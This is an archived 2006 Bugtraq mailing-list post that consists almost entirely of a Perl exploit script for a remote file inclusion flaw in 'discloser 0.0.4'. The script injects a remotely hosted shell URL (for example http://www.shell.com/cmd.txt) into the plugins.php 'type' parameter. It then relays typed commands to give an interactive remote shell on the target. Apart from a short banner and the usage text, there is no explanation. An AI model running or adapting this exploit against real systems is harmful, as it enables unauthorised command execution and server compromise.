lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <20060816215124.17322.qmail@securityfocus.com>
Date: 16 Aug 2006 21:51:24 -0000
From: dr.t3rr0r1st@...oo.com
To: bugtraq@...urityfocus.com
Subject: discloser 0.0.4 Remote File Inclusion (with Exploit)

#!/usr/bin/perl
	###########################################################################################
	#			Aria-Security.net Advisory                                   															     #
	#			Discovered  by: Dr.t3rr0r1st                                    														               #
	#			< www.Aria-security.net >                               														              #
	#		Gr33t to:Outlaw &  A.u.r.a  & HessamX & Cl0wn & DrtRp													                       #
	#		  Special Thanx To All Aria-Security Users      			  													 #
	###########################################################################################

use LWP::UserAgent;
print "\n === discloser 0.0.4 Remote File Inclusion\n";
print "\n === Discovered by OutLaw .\n";
print "\n  === www.Aria-Security.Net\n";

$bPath = $ARGV[0];
$cmdo = $ARGV[1];
$bcmd = $ARGV[2];

if($bPath!~/http:\/\// || $cmdo!~/http:\/\// || !$bcmd){usage()}



while()
{
       print "[Shell] \$";
while(<STDIN>)
       {
               $cmd=$_;
               chomp($cmd);

$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET =>$bpath.'plugins/plugins.php?type='.$cmdo.'?&'.$bcmd.'='.$cmd)or die "\n Could not connect !\n";
$res = $xpl->request($req);
$return = $res->content;
$return =~ tr/[\n]/[ê]/;
if (!$cmd) {print "\nPlease type a Command\n\n"; $return ="";}
elsif ($return =~/failed to open stream: HTTP request failed!/)
       {print "\n Could Not Connect to cmd Host\n";exit}
elsif ($return =~/^<b>Fatal.error/) {print "\n Invalid Command\n"}
if($return =~ /(.*)/)
{
       $freturn = $1;
       $freturn=~ tr/[ê]/[\n]/;
       print "\r\n$freturn\n\r";
       last;
}

else {print "[Shell] \$";}}}last;

sub usage()
 {
print " Usage : discloser.pl [host] [cmd shell location] [cmd shell variable]\n";
print " Example : fusion.pl http://site.com/path http://www.shell.com/cmd.txt cmd\n";
 exit();
 }

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ